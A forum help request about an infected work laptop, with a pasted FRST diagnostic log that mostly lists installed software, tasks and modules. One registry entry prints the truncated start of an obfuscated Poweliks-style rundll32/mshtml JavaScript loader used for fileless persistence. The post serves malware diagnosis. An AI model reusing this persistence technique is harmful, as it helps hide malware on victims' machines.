Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Remote employee's computer infected


  • This topic is locked This topic is locked
2 replies to this topic

#1 mtirado

mtirado

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:11:09 AM

Posted 14 November 2014 - 01:00 PM

So I got an email today that her Trend Micro started popping up with blocked site. I had her run 2 scans with Trend Micro and Malwarebytes. Both came back clean. In the logs of Trend Micro I found something launched 280 web queries at once. Some of the sites:  /tosearch.biz/search.php?query  /f0fff0.com/query?version= /fff5ee.com/query?

 

Here are the logs from FRST and addition.

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-11-2014 02

Ran by HStagner at 2014-11-14 12:51:54
Running from C:\Users\hstagner\Downloads\Malware fix (2)
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Trend Micro Client/Server Security Agent Antivirus (Enabled - Up to date) {F2F88E6A-3C7A-545F-268A-5D0BDD38EE06}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Trend Micro Client/Server Security Agent Anti-spyware (Enabled - Up to date) {49996F8E-1A40-5BD1-1C3A-6679A6BFA4BB}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
64 Bit HP CIO Components Installer (Version: 6.2.2 - Hewlett-Packard) Hidden
8500A909_BasicWeb (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
8500A909_Help_BasicWeb (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
ActivTrak Agent v4.0.5 (x32 Version: 4.0.5.0 - Birch Grove Software, Inc.) Hidden
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Flash Player 12 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Reader X (10.1.6) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.6 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{A922C4B7-50E0-4787-A94C-59DBF3C65DBE}) (Version: 3.0 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FE86CB0C-FCB3-4358-B4B0-B0A41E33B3DD}) (Version: 7.1.0.32 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Box Edit (HKLM-x32\...\{C5CF2E59-D4D9-4CBB-A680-284A75C14699}) (Version: 2.0.41.328 - Box)
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
Burn.Now 4.5 (x32 Version: 4.5.0 - Corel Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.18 - Piriform)
Cisco AnyConnect VPN Client (HKLM-x32\...\{9FC9E88A-5292-4E2C-B014-623F73D89B8C}) (Version: 2.5.2011 - Cisco Systems, Inc.)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{AC7E7905-8C59-4806-A96D-30936A2B1FC5}) (Version: 1.0.168 - Citrix)
Conexant 20672 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.32.23.2 - Conexant)
Corel Burn.Now Lenovo Edition (HKLM-x32\...\InstallShield_{A3BE3F1E-2472-4211-8735-E8239BE49D9F}) (Version: 4.5.0 - Corel Corporation)
Corel DVD MovieFactory 7 (x32 Version: 7.0.0 - Corel Corporation) Hidden
Corel DVD MovieFactory Lenovo Edition (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation)
Corel WinDVD (HKLM-x32\...\{5C1F18D2-F6B7-4242-B803-B5A78648185D}) (Version: 10.0.5.828 - Corel Inc.)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.8) (Version: 5.0.0.8 - Coupons.com Incorporated)
CouponBar (HKLM-x32\...\CouponBar5.0.0.4) (Version: 5.0.0.4 - Coupons.com Incorporated) <==== ATTENTION
CrashPlan (HKLM\...\{1D93DF5B-A7D0-451B-892C-E3E05E7C62E8}) (Version: 3.6.1 - CrashPlan)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Digsby (HKLM-x32\...\Digsby) (Version:  - dotSyntax, LLC)
Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden
Disable AMT Profile Synchronization Pop-up for Windows XP/Vista/7 (HKLM\...\DisableAMTPopup) (Version: 1.00 - )
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.7000.4 - Dolby Laboratories Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Drive (HKLM-x32\...\{C60F3836-333A-4AE2-B526-CFDBA143A9BA}) (Version: 1.18.7821.2489 - Google, Inc.)
Google Talk Plugin (HKLM-x32\...\{0C5C1177-94C5-3EFB-A8BE-3F6AF1AF887F}) (Version: 5.38.6.0 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
GoToMeeting 6.4.5.1865 (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\GoToMeeting) (Version: 6.4.5.1865 - CitrixOnline)
HP Officejet Pro 8500 A909 Series (HKLM\...\{B1054C0C-0C16-41E1-8A9D-35F065793E92}) (Version: 14.0 - HP)
IBM Tivoli Storage Manager Client (HKLM\...\{83B5A1A3-654F-4E2D-82D3-809BF3CA40CF}) (Version: 06.02.0100 - IBM)
iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)
Integrated Camera Driver Installer Package Ver.1.1.0.1147 (HKLM-x32\...\{B2CA6F37-1602-4823-81B5-0384B6888AA6}) (Version: 1.1.0.1147 - RICOH)
Integrated Camera TWAIN (HKLM-x32\...\{9CA0DEE4-E84B-466F-9B96-FC255F3A929F}) (Version: 1.0.11.1223 - Chicony Electronics Co.,Ltd.)
Intel PROSet Wireless (x32 Version:  - ) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Identity Protection Technology 1.1.2.0 (HKLM-x32\...\{C01A86F5-56E7-101F-9BC9-E3F1025EB779}) (Version: 1.1.2.0 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 16.4 - Intel)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2321 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{25FBDA9A-E868-4B3B-B9FF-D923818511A1}) (Version: 14.2.0000 - Intel Corporation)
ISAT 810 EMEA Production System (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\ISAT 810 EMEA Production System) (Version:  - Version 810.isat.11312.001)
iTunes (HKLM\...\{0D924CB2-2EA4-4044-BAF7-770202D6BD0D}) (Version: 11.1.4.62 - Apple Inc.)
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.450 - Oracle)
join.me (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\JoinMe) (Version: 1.14.0.141 - LogMeIn, Inc.)
Juniper Networks Secure Meeting 7.0.0 (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Juniper Secure Meeting 7.0.0) (Version: 7.0.0.19821 - Juniper Networks)
Juniper Networks Setup Client (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Juniper_Setup_Client) (Version: 2.2.5.10685 - Juniper Networks)
Juniper Networks Setup Client Activex Control (HKLM-x32\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 1.10 - )
Lenovo Patch Utility (HKLM-x32\...\{24E92E7A-6848-4747-A3EA-3AAC0576BE52}) (Version: 1.0.1.1 - Lenovo Group Limited)
Lenovo Patch Utility 64 bit (HKLM\...\{39A04221-294E-4D90-A0F2-CCB1EF15CB56}) (Version: 1.2.0.1 - Lenovo Group Limited)
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo Screen Reading Optimizer (HKLM-x32\...\{91A29166-4E1B-4664-B70B-4C4A3B6B3372}) (Version: 1.10 - Lenovo)
Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5802.24 - PC-Doctor, Inc.)
Lenovo User Guide (HKLM-x32\...\{13F59938-C595-479C-B479-F171AB9AF64F}) (Version: 1.0.0008.00 - Lenovo)
Lenovo Warranty Information (HKLM-x32\...\{FD4EC278-C1B1-4496-99ED-C0BE1B0AA521}) (Version: 1.0.0005.00 - Lenovo)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
Meraki Systems Manager Agent (HKLM-x32\...\{ECD390E3-2A0A-44A1-837E-C4594464C149}) (Version: 1.0.87 - Meraki)
Meraki Systems Manager Agent (HKLM-x32\...\{FB91B0C4-12C6-49FD-9A74-30659B79424A}) (Version: 1.0.86 - Meraki)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.0.1526.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visio Professional 2010 (HKLM\...\Office14.VISIO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 33.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0.3 (x86 en-US)) (Version: 33.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden
Nuance PDF Converter Professional 7 (HKLM\...\{FFAE98FC-4E1A-45BB-ADED-081160A2CBD7}) (Version: 7.20.6187 - Nuance Communications, Inc.)
Nuance PDF Converter Professional 7 (HKLM-x32\...\{FFAE98FC-4E1A-45BB-ADED-081160A2CBD7}) (Version: 7.20.6187 - Nuance Communications, Inc.)
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.60.01 - )
RapidBoot (HKLM\...\{5E2652DF-743F-482B-A593-C95F431A5769}) (Version: 1.11 - Lenovo)
Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.32.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.32.0 - Renesas Electronics Corporation) Hidden
RICOH_Media_Driver_v2.13.18.02 (HKLM-x32\...\{FE041B02-234C-4AAA-9511-80DF6482A458}) (Version: 2.13.18.02 - RICOH)
Scan (x32 Version: 140.0.167.000 - Hewlett-Packard) Hidden
Scansoft PDF Professional (x32 Version:  - ) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0057-0000-1000-0000000FF1CE}_Office14.VISIO_{3C578F10-F74F-4655-B2A6-9F88A6C415E8}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 4.01.0015 - Lenovo)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{C6C9D5F7-630C-4125-8C4E-94AF77C1896E}) (Version: 6.4.0.2900 - Broadcom Corporation)
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.40 - )
ThinkPad Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.61.00.11 - )
ThinkPad Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 3.64 - )
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.27.1 - )
ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.75 - Lenovo)
ThinkVantage AutoLock (HKLM\...\{E224B44B-B5EB-4af3-A80A-A255358E241A}_is1) (Version: 1.05 - Lenovo)
ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.06 - Lenovo)
Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden
Trend Micro Client/Server Security Agent (HKLM-x32\...\{BED0B8A2-2986-49F8-90D6-FA008D37A3D2}) (Version: 5.1.1103 - Trend Micro)
VIPAccess (HKLM-x32\...\{E8D46836-CD55-453C-A107-A59EC51CB8DC}) (Version: 2.0.1.91 - VeriSign)
WebReg (x32 Version: 140.0.213.017 - Hewlett-Packard) Hidden
Windows Driver Package - Hewlett-Packard Image  (12/27/2006 8.0.0.0) (HKLM\...\A86F74A8853ED6B1102811674C7B366AF1B276BB) (Version: 12/27/2006 8.0.0.0 - Hewlett-Packard)
Windows Driver Package - Intel (e1cexpress) Net  (12/21/2010 11.8.84.0) (HKLM\...\6D23A494E9A245843FB8584D9307D3E328DF8613) (Version: 12/21/2010 11.8.84.0 - Intel)
Windows Driver Package - Intel (MEIx64) System  (10/19/2010 7.0.0.1144) (HKLM\...\90FD26A77B849AE03FF5F07A1CDA7F950406A8D8) (Version: 10/19/2010 7.0.0.1144 - Intel)
Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\0CDBDD444A1F5FFEA227B4E7DCE195F11F08240A) (Version: 09/10/2010 9.2.0.1011 - Intel)
Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\A513FC5E5A08D4EF27F234E91E0E942A0234210B) (Version: 09/10/2010 9.2.0.1011 - Intel)
Windows Driver Package - Intel System  (10/04/2010 9.2.0.1015) (HKLM\...\FE1BEBFD475BB832AAF104F5C63348E98A9286DF) (Version: 10/04/2010 9.2.0.1015 - Intel)
Windows Driver Package - Intel USB  (09/16/2010 9.2.0.1013) (HKLM\...\D97688B8E3830BF9820E15EB8D9552DCBF988CFD) (Version: 09/16/2010 9.2.0.1013 - Intel)
Windows Driver Package - Lenovo 1.61.00.11 (11/11/2010 1.61.00.11) (HKLM\...\466E9B20D871055D6D3CDA2CDD1D355E978A61AF) (Version: 11/11/2010 1.61.00.11 - Lenovo)
Windows Driver Package - Synaptics (SynTP) Mouse  (03/24/2011 15.2.19.0) (HKLM\...\5DF942712DC7660AE4A1B04809A1C3F67B0CA27C) (Version: 03/24/2011 15.2.19.0 - Synaptics)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.20 beta 3 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.3 - win.rar GmbH)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {38F445A2-65DE-4FB0-88F7-44B7D973BFB6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131UA => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-18] (Google Inc.)
Task: {400F4305-C13F-4660-9560-94E9BFF17D74} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2011-10-04] (Lenovo Group Limited)
Task: {414FE650-6615-4CD8-8CF3-06EE6ED0380F} - System32\Tasks\Lenovo\SROptimizer => %TRPATH%\SRORest.exe
Task: {58025D8A-CF4C-4B7B-A328-055FCB05B689} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131Core => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-18] (Google Inc.)
Task: {5D57EAB2-9F43-4048-80EE-0255039EDAA5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-03-11] (Adobe Systems Incorporated)
Task: {5DB4428C-BBFA-4494-99DA-2BD145A21E09} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-03-31] (PC-Doctor, Inc.)
Task: {988A2A56-6C35-40AB-A74A-4CA55003E181} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: {A2FA614D-7551-4FC9-AF06-D261D9885C42} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {A73B378C-6AB3-4B9C-9299-14D3AF228602} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-03-31] (PC-Doctor, Inc.)
Task: {D6D052ED-EE97-4B1B-9BCB-50A5EC3C6B58} - System32\Tasks\G2MUpdateTask-S-1-5-21-2926875163-4226794389-2330185411-1131 => C:\Users\hstagner\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe [2014-10-29] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {DF3088BB-E2B6-4508-AE85-8BF7AF5A44E2} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()
Task: {E46F0D75-8707-4D20-8D69-4BAF4AEBF661} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe [2013-11-20] (Apple Inc.)
Task: {EBECB47C-2562-4585-B038-06162C8C43D0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-21] (Google Inc.)
Task: {FB011645-6596-45E3-AAAC-4034ACD44A1D} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-03-31] (PC-Doctor, Inc.)
Task: {FEA48913-28A2-4B52-A592-4701E92DF4FD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-21] (Google Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2926875163-4226794389-2330185411-1131.job => C:\Users\hstagner\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131Core.job => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131UA.job => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe
 
==================== Loaded Modules (whitelisted) =============
 
2013-08-15 15:55 - 2013-08-15 15:55 - 00014848 _____ () C:\Program Files\CrashPlan\md564.dll
2014-10-20 13:33 - 2014-10-20 13:33 - 00230400 _____ () C:\Program Files\CrashPlan\cpnative64.dll
2011-07-27 23:07 - 2011-07-27 23:07 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2013-11-19 23:58 - 2013-11-19 23:58 - 03103317 _____ () C:\Program Files (x86)\Meraki\PCC Agent 1.0.87\m_agent_service.exe
2010-04-26 21:10 - 2010-04-26 21:10 - 01357872 _____ () C:\Program Files\Tivoli\TSM\baclient\LIBEAY32.dll
2010-04-26 21:10 - 2010-04-26 21:10 - 00245808 _____ () C:\Program Files\Tivoli\TSM\baclient\SSLEAY32.dll
2010-01-28 01:10 - 2010-01-28 01:10 - 00186880 _____ () C:\Program Files\ibm\gsk8\lib64\N\icc\icclib\icclib019.dll
2010-04-26 21:07 - 2010-04-26 21:07 - 00252416 _____ () C:\Program Files\Tivoli\TSM\baclient\pegclient.dll
2010-04-26 21:07 - 2010-04-26 21:07 - 01696256 _____ () C:\Program Files\Tivoli\TSM\baclient\pegcommon.dll
2010-04-26 21:07 - 2010-04-26 21:07 - 00086528 _____ () C:\Program Files\Tivoli\TSM\baclient\pegslp_client.dll
2010-04-26 21:07 - 2010-04-26 21:07 - 00984064 _____ () C:\Program Files\Tivoli\TSM\baclient\zephyr.dll
